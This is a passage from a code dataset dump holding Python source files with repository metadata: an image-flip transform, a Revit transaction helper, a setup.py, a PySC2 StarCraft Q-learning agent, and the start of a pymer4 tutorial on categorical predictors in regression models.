the mask image for the segmentation dataset, and etc
:type lebel: PIL image
:return: the image after transform
:rtype: list, erery item is a PIL image, the first one is feature image, the second is label image
"""
flip = np.random.choice(2) * 2 - 1
channels_image = image.shape[-1]
channels_label = label.shape[-1]
if channels_image == 3:
image = image[:, :, ::flip]
else:
image = image[:, ::flip]
if channels_label == 3:
label = label[:, :, ::flip]
else:
label = label[:, ::flip]
return image, label
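A minimal usage sketch of the transform above (array shapes and values are assumptions for illustration, not taken from the vega documentation):
import numpy as np
pair_flip = RandomMirrow_pair()
image = np.random.rand(32, 32, 3)   # feature array whose last axis has length 3
label = np.random.rand(32, 32, 3)   # label array with the same layout
# About half the time flip == -1 and the slice [..., ::flip] reverses the
# last axis of both arrays together; otherwise both come back unchanged.
image_t, label_t = pair_flip(image, label)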
avg_line_length: 38.863636 | max_line_length: 106 | alphanum_fraction: 0.65731
content_no_comment:
import numpy as np
from vega.common import ClassFactory, ClassType
@ClassFactory.register(ClassType.TRANSFORM)
class RandomMirrow_pair(object):
def __call__(self, image, label):
flip = np.random.choice(2) * 2 - 1
channels_image = image.shape[-1]
channels_label = label.shape[-1]
if channels_image == 3:
image = image[:, :, ::flip]
else:
image = image[:, ::flip]
if channels_label == 3:
label = label[:, :, ::flip]
else:
label = label[:, ::flip]
return image, label
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790af5bb0ce3b02e55df6524c2c36c1ba99bae7f | size: 853 | ext: py | lang: Python
max_stars_repo: revitron/transaction.py | YKato521/revitron-for-RevitPythonShell @ 031a87997a00902bf16ca9ef6bb05f5cae26e044 | licenses: ["MIT"] | max_stars_count: null | stars events: null
max_issues_repo: revitron/transaction.py | YKato521/revitron-for-RevitPythonShell @ 031a87997a00902bf16ca9ef6bb05f5cae26e044 | licenses: ["MIT"] | max_issues_count: null | issues events: null
max_forks_repo: revitron/transaction.py | YKato521/revitron-for-RevitPythonShell @ 031a87997a00902bf16ca9ef6bb05f5cae26e044 | licenses: ["MIT"] | max_forks_count: null | forks events: null
content:
"""
The ``transaction`` submodule contains a wrapper class to simplify the usage of transactions::
t = revitron.Transaction()
...
t.commit()
"""
from pyrevit import script
class Transaction:
"""
A transaction helper class.
"""
def __init__(self):
"""
Inits a new transaction.
"""
import revitron
bundle = script.get_bundle_name().replace('.pushbutton', '')
self.transaction = revitron.DB.Transaction(revitron.DOC, bundle)
self.transaction.Start()
def commit(self):
"""
Commits the open transaction.
"""
self.transaction.Commit()
def rollback(self):
"""
Rolls back the open transaction.
"""
self.transaction.RollBack()
avg_line_length: 21.325 | max_line_length: 95 | alphanum_fraction: 0.532239
content_no_comment:
class Transaction:
def __init__(self):
import revitron
from pyrevit import script
bundle = script.get_bundle_name().replace('.pushbutton', '')
self.transaction = revitron.DB.Transaction(revitron.DOC, bundle)
self.transaction.Start()
def commit(self):
self.transaction.Commit()
def rollback(self):
self.transaction.RollBack()
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790af5c1ffd0a46710ca769801ece6193ae64d0f | size: 576 | ext: py | lang: Python
max_stars_repo: setup.py | tkhieu/pusher_client_python @ 2af2ceee06daf5b95eed2833760143ebe5b91946 | licenses: ["MIT"] | max_stars_count: null | stars events: null
max_issues_repo: setup.py | tkhieu/pusher_client_python @ 2af2ceee06daf5b95eed2833760143ebe5b91946 | licenses: ["MIT"] | max_issues_count: null | issues events: null
max_forks_repo: setup.py | tkhieu/pusher_client_python @ 2af2ceee06daf5b95eed2833760143ebe5b91946 | licenses: ["MIT"] | max_forks_count: null | forks events: null
content:
from setuptools import setup
setup(
name='pusher',
version='0.8',
description='A Python library for sending messages to Pusher',
author='Pusher',
author_email='support@pusher.com',
url='http://pusher.com',
packages=['pusher'],
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Internet :: WWW/HTTP",
],
keywords='pusher rest realtime websockets service',
license='MIT',
)
avg_line_length: 27.428571 | max_line_length: 66 | alphanum_fraction: 0.616319
content_no_comment:
from setuptools import setup
setup(
name='pusher',
version='0.8',
description='A Python library for sending messages to Pusher',
author='Pusher',
author_email='support@pusher.com',
url='http://pusher.com',
packages=['pusher'],
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Internet :: WWW/HTTP",
],
keywords='pusher rest realtime websockets service',
license='MIT',
)
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790af7237a25c95231de99572d94e2ea9aacf918 | size: 10,878 | ext: py | lang: Python
max_stars_repo: 7. Using Reward for Agent/reward_agent.py | Yudonggeun/PySC2-Tutorial @ 80449c3b5774a58e8ee6490379890e9abd60a11a | licenses: ["Apache-2.0"] | max_stars_count: 2 | stars events: 2018-11-13T14:17:47.000Z to 2018-11-14T12:37:20.000Z
max_issues_repo: 7. Using Reward for Agent/reward_agent.py | Tao-Chengyang/PySC2-Tutorial @ 80449c3b5774a58e8ee6490379890e9abd60a11a | licenses: ["Apache-2.0"] | max_issues_count: null | issues events: null
max_forks_repo: 7. Using Reward for Agent/reward_agent.py | Tao-Chengyang/PySC2-Tutorial @ 80449c3b5774a58e8ee6490379890e9abd60a11a | licenses: ["Apache-2.0"] | max_forks_count: 1 | forks events: 2019-09-02T08:15:43.000Z to 2019-09-02T08:15:43.000Z
content:
import random
import math
import os.path
import numpy as np
import pandas as pd
from pysc2.agents import base_agent
from pysc2.lib import actions
from pysc2.lib import features
_NO_OP = actions.FUNCTIONS.no_op.id
_SELECT_POINT = actions.FUNCTIONS.select_point.id
_BUILD_SUPPLY_DEPOT = actions.FUNCTIONS.Build_SupplyDepot_screen.id
_BUILD_BARRACKS = actions.FUNCTIONS.Build_Barracks_screen.id
_TRAIN_MARINE = actions.FUNCTIONS.Train_Marine_quick.id
_SELECT_ARMY = actions.FUNCTIONS.select_army.id
_ATTACK_MINIMAP = actions.FUNCTIONS.Attack_minimap.id
_HARVEST_GATHER = actions.FUNCTIONS.Harvest_Gather_screen.id
_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_UNIT_TYPE = features.SCREEN_FEATURES.unit_type.index
_PLAYER_ID = features.SCREEN_FEATURES.player_id.index
_PLAYER_SELF = 1
_PLAYER_HOSTILE = 4
_ARMY_SUPPLY = 5
_TERRAN_COMMANDCENTER = 18
_TERRAN_SCV = 45
_TERRAN_SUPPLY_DEPOT = 19
_TERRAN_BARRACKS = 21
_NEUTRAL_MINERAL_FIELD = 341
_NOT_QUEUED = [0]
_QUEUED = [1]
_SELECT_ALL = [2]
DATA_FILE = 'sparse_agent_data'
ACTION_DO_NOTHING = 'donothing'
ACTION_BUILD_SUPPLY_DEPOT = 'buildsupplydepot'
ACTION_BUILD_BARRACKS = 'buildbarracks'
ACTION_BUILD_MARINE = 'buildmarine'
ACTION_ATTACK = 'attack'
smart_actions = [
ACTION_DO_NOTHING,
ACTION_BUILD_SUPPLY_DEPOT,
ACTION_BUILD_BARRACKS,
ACTION_BUILD_MARINE,
]
for mm_x in range(0, 64):
for mm_y in range(0, 64):
if (mm_x + 1) % 32 == 0 and (mm_y + 1) % 32 == 0:
smart_actions.append(ACTION_ATTACK + '_' + str(mm_x - 16) + '_' + str(mm_y - 16))
# Stolen from https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow
class QLearningTable:
def __init__(self, actions, learning_rate=0.01, reward_decay=0.9, e_greedy=0.9):
self.actions = actions # a list
self.lr = learning_rate
self.gamma = reward_decay
self.epsilon = e_greedy
self.q_table = pd.DataFrame(columns=self.actions, dtype=np.float64)
def choose_action(self, observation):
self.check_state_exist(observation)
if np.random.uniform() < self.epsilon:
# choose best action
state_action = self.q_table.ix[observation, :]
# some actions have the same value
state_action = state_action.reindex(np.random.permutation(state_action.index))
action = state_action.idxmax()
else:
# choose random action
action = np.random.choice(self.actions)
return action
def learn(self, s, a, r, s_):
self.check_state_exist(s_)
self.check_state_exist(s)
q_predict = self.q_table.ix[s, a]
if s_ != 'terminal':
q_target = r + self.gamma * self.q_table.ix[s_, :].max()
else:
q_target = r # next state is terminal
# update
self.q_table.ix[s, a] += self.lr * (q_target - q_predict)
def check_state_exist(self, state):
if state not in self.q_table.index:
# append new state to q table
self.q_table = self.q_table.append(
pd.Series([0] * len(self.actions), index=self.q_table.columns, name=state))
class SparseAgent(base_agent.BaseAgent):
def __init__(self):
super(SparseAgent, self).__init__()
self.qlearn = QLearningTable(actions=list(range(len(smart_actions))))
self.previous_action = None
self.previous_state = None
self.cc_y = None
self.cc_x = None
self.move_number = 0
if os.path.isfile(DATA_FILE + '.gz'):
self.qlearn.q_table = pd.read_pickle(DATA_FILE + '.gz', compression='gzip')
def transformDistance(self, x, x_distance, y, y_distance):
if not self.base_top_left:
return [x - x_distance, y - y_distance]
return [x + x_distance, y + y_distance]
def transformLocation(self, x, y):
if not self.base_top_left:
return [64 - x, 64 - y]
return [x, y]
def splitAction(self, action_id):
smart_action = smart_actions[action_id]
x = 0
y = 0
if '_' in smart_action:
smart_action, x, y = smart_action.split('_')
return (smart_action, x, y)
def step(self, obs):
super(SparseAgent, self).step(obs)
if obs.last():
reward = obs.reward
self.qlearn.learn(str(self.previous_state), self.previous_action, reward, 'terminal')
self.qlearn.q_table.to_pickle(DATA_FILE + '.gz', 'gzip')
self.previous_action = None
self.previous_state = None
self.move_number = 0
return actions.FunctionCall(_NO_OP, [])
unit_type = obs.observation['screen'][_UNIT_TYPE]
if obs.first():
player_y, player_x = (obs.observation['feature_minimap'][_PLAYER_RELATIVE] == _PLAYER_SELF).nonzero()
self.base_top_left = 1 if player_y.any() and player_y.mean() <= 31 else 0
self.cc_y, self.cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()
cc_y, cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()
cc_count = 1 if cc_y.any() else 0
depot_y, depot_x = (unit_type == _TERRAN_SUPPLY_DEPOT).nonzero()
supply_depot_count = int(round(len(depot_y) / 69))
barracks_y, barracks_x = (unit_type == _TERRAN_BARRACKS).nonzero()
barracks_count = int(round(len(barracks_y) / 137))
if self.move_number == 0:
self.move_number += 1
current_state = np.zeros(8)
current_state[0] = cc_count
current_state[1] = supply_depot_count
current_state[2] = barracks_count
current_state[3] = obs.observation['player'][_ARMY_SUPPLY]
hot_squares = np.zeros(4)
enemy_y, enemy_x = (obs.observation['feature_minimap'][_PLAYER_RELATIVE] == _PLAYER_HOSTILE).nonzero()
for i in range(0, len(enemy_y)):
y = int(math.ceil((enemy_y[i] + 1) / 32))
x = int(math.ceil((enemy_x[i] + 1) / 32))
hot_squares[((y - 1) * 2) + (x - 1)] = 1
if not self.base_top_left:
hot_squares = hot_squares[::-1]
for i in range(0, 4):
current_state[i + 4] = hot_squares[i]
if self.previous_action is not None:
self.qlearn.learn(str(self.previous_state), self.previous_action, 0, str(current_state))
rl_action = self.qlearn.choose_action(str(current_state))
self.previous_state = current_state
self.previous_action = rl_action
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:
unit_y, unit_x = (unit_type == _TERRAN_SCV).nonzero()
if unit_y.any():
i = random.randint(0, len(unit_y) - 1)
target = [unit_x[i], unit_y[i]]
return actions.FunctionCall(_SELECT_POINT, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_MARINE:
if barracks_y.any():
i = random.randint(0, len(barracks_y) - 1)
target = [barracks_x[i], barracks_y[i]]
return actions.FunctionCall(_SELECT_POINT, [_SELECT_ALL, target])
elif smart_action == ACTION_ATTACK:
if _SELECT_ARMY in obs.observation['available_actions']:
return actions.FunctionCall(_SELECT_ARMY, [_NOT_QUEUED])
elif self.move_number == 1:
self.move_number += 1
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_SUPPLY_DEPOT:
if supply_depot_count < 2 and _BUILD_SUPPLY_DEPOT in obs.observation['available_actions']:
if self.cc_y.any():
if supply_depot_count == 0:
target = self.transformDistance(round(self.cc_x.mean()), -35, round(self.cc_y.mean()), 0)
elif supply_depot_count == 1:
target = self.transformDistance(round(self.cc_x.mean()), -25, round(self.cc_y.mean()), -25)
return actions.FunctionCall(_BUILD_SUPPLY_DEPOT, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_BARRACKS:
if barracks_count < 2 and _BUILD_BARRACKS in obs.observation['available_actions']:
if self.cc_y.any():
if barracks_count == 0:
target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), -9)
elif barracks_count == 1:
target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), 12)
return actions.FunctionCall(_BUILD_BARRACKS, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_MARINE:
if _TRAIN_MARINE in obs.observation['available_actions']:
return actions.FunctionCall(_TRAIN_MARINE, [_QUEUED])
elif smart_action == ACTION_ATTACK:
do_it = True
if len(obs.observation['single_select']) > 0 and obs.observation['single_select'][0][0] == _TERRAN_SCV:
do_it = False
if len(obs.observation['multi_select']) > 0 and obs.observation['multi_select'][0][0] == _TERRAN_SCV:
do_it = False
if do_it and _ATTACK_MINIMAP in obs.observation["available_actions"]:
x_offset = random.randint(-1, 1)
y_offset = random.randint(-1, 1)
return actions.FunctionCall(_ATTACK_MINIMAP, [_NOT_QUEUED,
self.transformLocation(int(x) + (x_offset * 8),
int(y) + (y_offset * 8))])
elif self.move_number == 2:
self.move_number = 0
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:
if _HARVEST_GATHER in obs.observation['available_actions']:
unit_y, unit_x = (unit_type == _NEUTRAL_MINERAL_FIELD).nonzero()
if unit_y.any():
i = random.randint(0, len(unit_y) - 1)
m_x = unit_x[i]
m_y = unit_y[i]
target = [int(m_x), int(m_y)]
return actions.FunctionCall(_HARVEST_GATHER, [_QUEUED, target])
return actions.FunctionCall(_NO_OP, [])
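For reference, a small worked instance of the temporal-difference update that QLearningTable.learn() applies (numbers chosen only for illustration): with learning_rate=0.01 and reward_decay=0.9, if the current entry is Q[s, a] = 0.5, the reward r is 0 and the best next-state value is 1.0, then q_target = 0 + 0.9 * 1.0 = 0.9 and the entry moves to 0.5 + 0.01 * (0.9 - 0.5) = 0.504. At the end of an episode the same update is applied with r = obs.reward and the terminal target q_target = r.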
avg_line_length: 36.503356 | max_line_length: 119 | alphanum_fraction: 0.602041
content_no_comment:
import random
import math
import os.path
import numpy as np
import pandas as pd
from pysc2.agents import base_agent
from pysc2.lib import actions
from pysc2.lib import features
_NO_OP = actions.FUNCTIONS.no_op.id
_SELECT_POINT = actions.FUNCTIONS.select_point.id
_BUILD_SUPPLY_DEPOT = actions.FUNCTIONS.Build_SupplyDepot_screen.id
_BUILD_BARRACKS = actions.FUNCTIONS.Build_Barracks_screen.id
_TRAIN_MARINE = actions.FUNCTIONS.Train_Marine_quick.id
_SELECT_ARMY = actions.FUNCTIONS.select_army.id
_ATTACK_MINIMAP = actions.FUNCTIONS.Attack_minimap.id
_HARVEST_GATHER = actions.FUNCTIONS.Harvest_Gather_screen.id
_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_UNIT_TYPE = features.SCREEN_FEATURES.unit_type.index
_PLAYER_ID = features.SCREEN_FEATURES.player_id.index
_PLAYER_SELF = 1
_PLAYER_HOSTILE = 4
_ARMY_SUPPLY = 5
_TERRAN_COMMANDCENTER = 18
_TERRAN_SCV = 45
_TERRAN_SUPPLY_DEPOT = 19
_TERRAN_BARRACKS = 21
_NEUTRAL_MINERAL_FIELD = 341
_NOT_QUEUED = [0]
_QUEUED = [1]
_SELECT_ALL = [2]
DATA_FILE = 'sparse_agent_data'
ACTION_DO_NOTHING = 'donothing'
ACTION_BUILD_SUPPLY_DEPOT = 'buildsupplydepot'
ACTION_BUILD_BARRACKS = 'buildbarracks'
ACTION_BUILD_MARINE = 'buildmarine'
ACTION_ATTACK = 'attack'
smart_actions = [
ACTION_DO_NOTHING,
ACTION_BUILD_SUPPLY_DEPOT,
ACTION_BUILD_BARRACKS,
ACTION_BUILD_MARINE,
]
for mm_x in range(0, 64):
for mm_y in range(0, 64):
if (mm_x + 1) % 32 == 0 and (mm_y + 1) % 32 == 0:
smart_actions.append(ACTION_ATTACK + '_' + str(mm_x - 16) + '_' + str(mm_y - 16))
class QLearningTable:
def __init__(self, actions, learning_rate=0.01, reward_decay=0.9, e_greedy=0.9):
self.actions = actions
self.lr = learning_rate
self.gamma = reward_decay
self.epsilon = e_greedy
self.q_table = pd.DataFrame(columns=self.actions, dtype=np.float64)
def choose_action(self, observation):
self.check_state_exist(observation)
if np.random.uniform() < self.epsilon:
state_action = self.q_table.ix[observation, :]
state_action = state_action.reindex(np.random.permutation(state_action.index))
action = state_action.idxmax()
else:
action = np.random.choice(self.actions)
return action
def learn(self, s, a, r, s_):
self.check_state_exist(s_)
self.check_state_exist(s)
q_predict = self.q_table.ix[s, a]
if s_ != 'terminal':
q_target = r + self.gamma * self.q_table.ix[s_, :].max()
else:
q_target = r
self.q_table.ix[s, a] += self.lr * (q_target - q_predict)
def check_state_exist(self, state):
if state not in self.q_table.index:
self.q_table = self.q_table.append(
pd.Series([0] * len(self.actions), index=self.q_table.columns, name=state))
class SparseAgent(base_agent.BaseAgent):
def __init__(self):
super(SparseAgent, self).__init__()
self.qlearn = QLearningTable(actions=list(range(len(smart_actions))))
self.previous_action = None
self.previous_state = None
self.cc_y = None
self.cc_x = None
self.move_number = 0
if os.path.isfile(DATA_FILE + '.gz'):
self.qlearn.q_table = pd.read_pickle(DATA_FILE + '.gz', compression='gzip')
def transformDistance(self, x, x_distance, y, y_distance):
if not self.base_top_left:
return [x - x_distance, y - y_distance]
return [x + x_distance, y + y_distance]
def transformLocation(self, x, y):
if not self.base_top_left:
return [64 - x, 64 - y]
return [x, y]
def splitAction(self, action_id):
smart_action = smart_actions[action_id]
x = 0
y = 0
if '_' in smart_action:
smart_action, x, y = smart_action.split('_')
return (smart_action, x, y)
def step(self, obs):
super(SparseAgent, self).step(obs)
if obs.last():
reward = obs.reward
self.qlearn.learn(str(self.previous_state), self.previous_action, reward, 'terminal')
self.qlearn.q_table.to_pickle(DATA_FILE + '.gz', 'gzip')
self.previous_action = None
self.previous_state = None
self.move_number = 0
return actions.FunctionCall(_NO_OP, [])
unit_type = obs.observation['screen'][_UNIT_TYPE]
if obs.first():
player_y, player_x = (obs.observation['feature_minimap'][_PLAYER_RELATIVE] == _PLAYER_SELF).nonzero()
self.base_top_left = 1 if player_y.any() and player_y.mean() <= 31 else 0
self.cc_y, self.cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()
cc_y, cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()
cc_count = 1 if cc_y.any() else 0
depot_y, depot_x = (unit_type == _TERRAN_SUPPLY_DEPOT).nonzero()
supply_depot_count = int(round(len(depot_y) / 69))
barracks_y, barracks_x = (unit_type == _TERRAN_BARRACKS).nonzero()
barracks_count = int(round(len(barracks_y) / 137))
if self.move_number == 0:
self.move_number += 1
current_state = np.zeros(8)
current_state[0] = cc_count
current_state[1] = supply_depot_count
current_state[2] = barracks_count
current_state[3] = obs.observation['player'][_ARMY_SUPPLY]
hot_squares = np.zeros(4)
enemy_y, enemy_x = (obs.observation['feature_minimap'][_PLAYER_RELATIVE] == _PLAYER_HOSTILE).nonzero()
for i in range(0, len(enemy_y)):
y = int(math.ceil((enemy_y[i] + 1) / 32))
x = int(math.ceil((enemy_x[i] + 1) / 32))
hot_squares[((y - 1) * 2) + (x - 1)] = 1
if not self.base_top_left:
hot_squares = hot_squares[::-1]
for i in range(0, 4):
current_state[i + 4] = hot_squares[i]
if self.previous_action is not None:
self.qlearn.learn(str(self.previous_state), self.previous_action, 0, str(current_state))
rl_action = self.qlearn.choose_action(str(current_state))
self.previous_state = current_state
self.previous_action = rl_action
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:
unit_y, unit_x = (unit_type == _TERRAN_SCV).nonzero()
if unit_y.any():
i = random.randint(0, len(unit_y) - 1)
target = [unit_x[i], unit_y[i]]
return actions.FunctionCall(_SELECT_POINT, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_MARINE:
if barracks_y.any():
i = random.randint(0, len(barracks_y) - 1)
target = [barracks_x[i], barracks_y[i]]
return actions.FunctionCall(_SELECT_POINT, [_SELECT_ALL, target])
elif smart_action == ACTION_ATTACK:
if _SELECT_ARMY in obs.observation['available_actions']:
return actions.FunctionCall(_SELECT_ARMY, [_NOT_QUEUED])
elif self.move_number == 1:
self.move_number += 1
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_SUPPLY_DEPOT:
if supply_depot_count < 2 and _BUILD_SUPPLY_DEPOT in obs.observation['available_actions']:
if self.cc_y.any():
if supply_depot_count == 0:
target = self.transformDistance(round(self.cc_x.mean()), -35, round(self.cc_y.mean()), 0)
elif supply_depot_count == 1:
target = self.transformDistance(round(self.cc_x.mean()), -25, round(self.cc_y.mean()), -25)
return actions.FunctionCall(_BUILD_SUPPLY_DEPOT, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_BARRACKS:
if barracks_count < 2 and _BUILD_BARRACKS in obs.observation['available_actions']:
if self.cc_y.any():
if barracks_count == 0:
target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), -9)
elif barracks_count == 1:
target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), 12)
return actions.FunctionCall(_BUILD_BARRACKS, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_MARINE:
if _TRAIN_MARINE in obs.observation['available_actions']:
return actions.FunctionCall(_TRAIN_MARINE, [_QUEUED])
elif smart_action == ACTION_ATTACK:
do_it = True
if len(obs.observation['single_select']) > 0 and obs.observation['single_select'][0][0] == _TERRAN_SCV:
do_it = False
if len(obs.observation['multi_select']) > 0 and obs.observation['multi_select'][0][0] == _TERRAN_SCV:
do_it = False
if do_it and _ATTACK_MINIMAP in obs.observation["available_actions"]:
x_offset = random.randint(-1, 1)
y_offset = random.randint(-1, 1)
return actions.FunctionCall(_ATTACK_MINIMAP, [_NOT_QUEUED,
self.transformLocation(int(x) + (x_offset * 8),
int(y) + (y_offset * 8))])
elif self.move_number == 2:
self.move_number = 0
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:
if _HARVEST_GATHER in obs.observation['available_actions']:
unit_y, unit_x = (unit_type == _NEUTRAL_MINERAL_FIELD).nonzero()
if unit_y.any():
i = random.randint(0, len(unit_y) - 1)
m_x = unit_x[i]
m_y = unit_y[i]
target = [int(m_x), int(m_y)]
return actions.FunctionCall(_HARVEST_GATHER, [_QUEUED, target])
return actions.FunctionCall(_NO_OP, [])
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790af7bd2d5fe80e00cfb7791746b8974f1179bf | size: 9,230 | ext: py | lang: Python
max_stars_repo: examples/example_02_categorical.py | jcheong0428/pymer4 @ 7e98fa28f5fdc01e8f786e381179c6b36067ef90 | licenses: ["MIT"] | max_stars_count: 127 | stars events: 2017-06-02T16:49:38.000Z to 2022-03-18T03:45:55.000Z
max_issues_repo: examples/example_02_categorical.py | jarrelscy/pymer4 @ 248c25c0c17918c7a2ed61d86f42f7188e9aad94 | licenses: ["MIT"] | max_issues_count: 90 | issues events: 2017-05-08T07:30:24.000Z to 2022-03-29T18:26:18.000Z
max_forks_repo: examples/example_02_categorical.py | jarrelscy/pymer4 @ 248c25c0c17918c7a2ed61d86f42f7188e9aad94 | licenses: ["MIT"] | max_forks_count: 26 | forks events: 2017-11-23T17:41:49.000Z to 2022-03-04T16:10:55.000Z
content:
"""
2. Categorical Predictors
=========================
"""
###############################################################################
# The syntax for handling categorical predictors is **different** between standard regression models/two-stage-models (i.e. :code:`Lm` and :code:`Lm2`) and multi-level models (:code:`Lmer`) in :code:`pymer4`. This is because formula parsing is passed to R for :code:`Lmer` models, but handled by Python for other models.
###############################################################################
# Lm and Lm2 Models
# -----------------
# :code:`Lm` and :code:`Lm2` models use `patsy <https://patsy.readthedocs.io/en/latest/>`_ to parse model formulae. Patsy is very powerful and has built-in support for handling categorical coding schemes by wrapping a predictor in :code:`C()` *within* the model formula. Patsy can also perform some pre-processing such as scaling and standardization using special functions like :code:`center()`. Here are some examples.
# import basic libraries and sample data
import os
import pandas as pd
from pymer4.utils import get_resource_path
from pymer4.models import Lm
# IV3 is a categorical predictors with 3 levels in the sample data
df = pd.read_csv(os.path.join(get_resource_path(), "sample_data.csv"))
###############################################################################
# Dummy-coded/Treatment contrasts
# +++++++++++++++++++++++++++++++
# Estimate a model using Treatment contrasts (dummy-coding)
# with '1.0' as the reference level
# This is the default of the C() function
model = Lm("DV ~ C(IV3, levels=[1.0, 0.5, 1.5])", data=df)
print(model.fit())
###############################################################################
# Orthogonal Polynomial Contrasts
# +++++++++++++++++++++++++++++++
# Patsy can do this using the Poly argument to the
# C() function
model = Lm("DV ~ C(IV3, Poly)", data=df)
print(model.fit())
###############################################################################
# Sum-to-zero contrasts
# +++++++++++++++++++++
# Similar to before but with the Sum argument
model = Lm("DV ~ C(IV3, Sum)", data=df)
print(model.fit())
###############################################################################
# Scaling/Centering
# +++++++++++++++++
# Moderation with IV2, but centering IV2 first
model = Lm("DV ~ center(IV2) * C(IV3, Sum)", data=df)
print(model.fit())
###############################################################################
# Please refer to the `patsy documentation <https://patsy.readthedocs.io/en/latest/categorical-coding.html>`_ for more details when working with categorical predictors in :code:`Lm` or :code:`Lm2` models.
###############################################################################
# Lmer Models
# -----------
# :code:`Lmer()` models currently have support for handling categorical predictors in one of three ways based on how R's :code:`factor()` works (see the note at the end of this tutorial):
#
# - Dummy-coded factor levels (treatment contrasts) in which each model term is the difference between a factor level and a selected reference level
# - Orthogonal polynomial contrasts in which each model term is a polynomial contrast across factor levels (e.g. linear, quadratic, cubic, etc)
# - Custom contrasts for each level of a factor, which should be provided in the manner expected by R.
#
# To make re-parameterizing models easier, factor codings are passed as a dictionary to the :code:`factors` argument of a model's :code:`.fit()`. This obviates the need for adjusting data-frame properties as in R. Note that this is **different** from :code:`Lm` and :code:`Lm2` models above which expect factor codings in their formulae (because patsy does).
#
# Each of these ways also enables you to easily compute post-hoc comparisons between factor levels, as well as interactions between continuous predictors and each factor level. See tutorial 3 for more on post-hoc tests.
from pymer4.models import Lmer
# We're going to fit a multi-level logistic regression using the
# dichotomous DV_l variable and the same categorical predictor (IV3)
# as before
model = Lmer("DV_l ~ IV3 + (IV3|Group)", data=df, family="binomial")
###############################################################################
# Dummy-coding factors
# ++++++++++++++++++++
# First we'll use dummy-coding/treatment contrasts with 1.0 as the reference level. This will compute two coefficients: 0.5 > 1.0 and 1.5 > 1.0.
print(model.fit(factors={"IV3": ["1.0", "0.5", "1.5"]}))
###############################################################################
# Polynomial contrast coding
# ++++++++++++++++++++++++++
# Second we'll use orthogonal polynomial contrasts. This is accomplished using the :code:`ordered=True` argument and specifying the factor levels of the *linear* contrast in increasing order. R will automatically compute higher-order polynomial contrasts that are orthogonal to this linear contrast. In this example, since there are 3 factor levels, this will result in two polynomial terms: a linear contrast we specify below corresponding to 0.5 < 1.0 < 1.5, and an orthogonal quadratic contrast automatically determined by R, corresponding to 0.5 > 1.0 < 1.5
print(model.fit(factors={"IV3": ["0.5", "1.0", "1.5"]}, ordered=True))
###############################################################################
# Custom contrasts
# ++++++++++++++++
# :code:`Lmer` models can also take custom factor contrasts, specified in the format R expects (see the note at the end of this tutorial for how contrasts work in R). Remember that there can be at most k-1 model terms representing any k-level factor without over-parameterizing a model. If you specify a custom contrast, R will generate a set of orthogonal contrasts for the rest of your model terms.
# Compare level '1.0' to the mean of levels '0.5' and '1.5'
# and let R determine the second contrast orthogonal to it
print(model.fit(factors={"IV3": {"1.0": 1, "0.5": -0.5, "1.5": -0.5}}))
###############################################################################
# User-created contrasts (without R)
# ++++++++++++++++++++++++++++++++++
# Another option available to you is fitting a model with *only* your desired contrast(s) rather than a full set of k-1 contrasts. Contrary to how statistics is usually taught, you don't ever *have to* include a full set of k-1 contrasts for a k-level factor! The upside is that you won't need to rely on R to compute anything for you (aside from the model fit), and your model will have exactly as many terms as the contrasts you desire, giving you complete control. The downside is that post-hoc tests will no longer be available (see tutorial 3 for more information on post-hoc tests), but it's unlikely you're doing post-hoc tests if you're computing a subset of specific contrasts anyway. This is also a useful approach if you don't want to use patsy's formula syntax with :code:`Lm` and :code:`Lm2`, as noted above.
#
# This can be accomplished by creating new columns in your dataframe to test specific hypotheses and is trivial to do with pandas `map <https://pandas.pydata.org/pandas-docs/version/0.25/reference/api/pandas.Series.map.html/>`_ and `assign <https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.assign.html/>`_ methods. For example, here we manually compute a linear contrast by creating a new column in our dataframe and treating it as a continuous variable.
# Create a new column in the dataframe with a custom (linear) contrast
df = df.assign(IV3_custom_lin=df["IV3"].map({0.5: -1, 1.0: 0, 1.5: 1}))
print(df.head())
###############################################################################
# Now we can use this variable as a continuous predictor without the need for the :code:`factors` argument. Notice how the z-stat and p-value of the estimate are the same as those of the linear polynomial contrast estimated above. The coefficients differ in scale only because R uses [~-0.707, ~0, ~0.707] for its polynomial contrasts rather than [-1, 0, 1] like we did (see the quick numeric check after the model fit below).
# Estimate model
model = Lmer(
